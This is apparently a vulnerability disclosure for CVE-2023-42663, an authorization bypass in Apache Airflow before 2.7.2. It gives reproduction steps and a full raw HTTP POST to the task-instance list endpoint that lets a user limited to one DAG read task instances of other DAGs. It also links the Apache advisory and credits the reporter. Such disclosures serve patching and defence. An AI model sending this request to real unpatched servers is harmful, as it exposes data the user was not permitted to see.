CVE-2023-42663: Apache Airflow: Bypass permission verification to view task instances of other dags

Apache Airflow, versions before 2.7.2, has a vulnerability that allows an authorized user who has access to read specific DAGs only, to read information about task instances in other DAGs. #Steps to reproduce : 1. Copy a User role, name it roleA, and remove the "can read on DAGs" "can delete on DAGs" "can edit on DAGs" permissions.Add "can read on DAG:tutorial" permissions {F2771458} 2. Create a user named test and assign RoleA to it. {F2771447} 3. Log in to the test account, we can only see the DAG named tutorial.Can't see task instances from other DAGs either. {F2771449} {F2771451} 4. Use burpsuite to send the following message, and you can see the task instances of other DAGs. (replaced with the session of the test account) ``` POST /api/v1/dags/~/dagRuns/~/taskInstances/list HTTP/1.1 Host: testvul.com:8080 Accept: application/json User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 content-type: application/json Referer: http://testvul.com:8080/dags/example_external_task_marker_parent/grid Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: session=3d17f3fe-e02b-4f16-88f1-fd59e299ae0c.a4kyHK7of13T0NtbCVVmPgFtSDU Connection: close Content-Length: 2 {} ``` {F2771461} **Security Advisory**: https://lists.apache.org/thread/xj86cvfkxgd0cyqfmz6mh1bsfc61c6o9 **Severity**: Low **Credit**: balis0ng ## Impact It allows an authorized user who has access to read specific DAGs only, to read information about task instances in other DAGs.